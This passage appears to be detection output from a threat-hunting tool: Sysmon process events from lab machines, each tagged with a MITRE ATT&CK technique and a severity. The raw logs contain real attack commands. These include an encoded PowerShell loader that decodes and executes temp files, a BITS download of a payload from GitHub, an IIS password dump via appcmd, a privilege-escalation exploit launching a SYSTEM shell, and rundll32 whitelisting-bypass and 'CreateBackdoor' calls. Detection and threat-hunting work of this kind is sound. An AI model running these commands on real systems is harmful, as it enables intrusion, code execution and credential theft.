SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,Critical,"Found User (MSEDGEWIN10\IEUser) run Suspicious PowerShell commands that include ( -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt, -c ,-Destination ,-Destination,powershell,reg,Start-BitsTransfer,.txt) in event with Command Line (powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1197] BITS Jobs - Process,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "c:\Windows\System32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 112815 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-07 13:13:02.476 + 747F3D96-095E-5EB4-0000-0010D46F1800 + 5216 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "c:\Windows\System32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-08F7-5EB4-0000-0020BAEC0200 + 0x2ecba + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-095E-5EB4-0000-001002511800 + 6396 + C:\Windows\System32\changepk.exe + "C:\Windows\system32\ChangePk.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1564435984.008882,2019-07-30T01:33:04.008882+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4895 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.695 + 747F3D96-660F-5D3F-0000-00106B508600 + 6720 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564913810.45591,2019-08-04T14:16:50.455910+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5950 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 10:16:49.960 + 747F3D96-B091-5D46-0000-001081F71104 + 820 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c start C:\Windows\system32\cmd.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-B080-5D46-0000-0010D4EA0F04 + 2112 + C:\Windows\System32\WSReset.exe + "C:\Windows\system32\WSReset.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1595802375.141764,2020-07-27T02:26:15.141764+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 339222 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-07-26 22:26:14.521 + 747F3D96-0306-5F1E-0000-0010E15F3100 + 3660 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-F938-5F1D-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-F938-5F1D-0000-00104B500000 + 584 + C:\Windows\System32\winlogon.exe + winlogon.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.555423,2019-05-27T05:29:20.555423+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5991 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.475 + 365ABB72-3D70-5CEB-0000-0010F2EDFF00 + 4012 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564834103.555174,2019-08-03T16:08:23.555174+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5452 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 12:08:23.391 + 747F3D96-7937-5D45-0000-00100D290801 + 4192 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-D4E9-5D45-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-7934-5D45-0000-0010CAB90701 + 7564 + C:\Windows\System32\consent.exe + consent.exe 896 272 00000280644BC500 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1589069378.023663,2020-05-10T04:09:38.023663+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 112969 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-05-10 00:09:36.703 + 747F3D96-4640-5EB7-0000-0010EF364B01 + 372 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + c:\Users\IEUser\Tools\PrivEsc\ + NT AUTHORITY\SYSTEM + 747F3D96-3B92-5EB5-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-4640-5EB7-0000-0010292D4B01 + 8028 + C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe + NetworkServiceExploit.exe -i -c "c:\Windows\System32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.998461,2020-03-21T09:00:17.998461+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243516 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.518 + 747F3D96-9F61-5E75-0000-00109B6C1E00 + 6620 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1," + + + + + 